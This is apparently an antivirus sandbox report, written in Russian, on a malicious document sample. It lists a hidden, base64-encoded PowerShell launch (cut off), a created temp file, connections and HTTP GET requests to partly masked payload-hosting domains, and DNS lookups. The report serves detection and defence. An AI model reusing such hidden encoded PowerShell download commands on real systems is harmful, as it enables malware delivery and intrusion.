Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABIAHYAdQB6AG4AYQBiAHQAYQBtAGsAPQAnAEYAcQBzAGIAbgBvAGEAYQAnADsAJABVAGEAdgBtAHAAaAB6AHMAdQAgAD0AIAAnADkANwA1ACcAOwAkAFAAcAB3AHUAcABmAHEAbwBzAD0AJwBPAG8AbQBhAGoAdABuAGUAJwA7ACQARgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1380296.cvr
Сетевая активность
Подключается к
- 'am###homes.ca':80
- 'bo####g.arai.agency':80
- 'vl#e.kr':443
- 'to#######los.000webhostapp.com':443
TCP
Запросы HTTP GET
- http://am###homes.ca/scss/eGHgoiqi/
- http://bo####g.arai.agency/core/mzVfRWm/
Другие
- 'vl#e.kr':443
- 'to#######los.000webhostapp.com':443
UDP
- DNS ASK fl##z.xyz
- DNS ASK am###homes.ca
- DNS ASK bo####g.arai.agency
- DNS ASK vl#e.kr
- DNS ASK to#######los.000webhostapp.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABIAHYAdQB6AG4AYQBiAHQAYQBtAGsAPQAnAEYAcQBzAGIAbgBvAGEAYQAnADsAJABVAGEAdgBtAHAAaAB6AHMAdQAgAD0AIAAnADkANwA1ACcAOwAkAFAAcAB3AHUAcABmAHEAbwBzAD0AJwBPAG8AbQBhAGoAdABuAGUAJwA7ACQARgB...' (со скрытым окном)
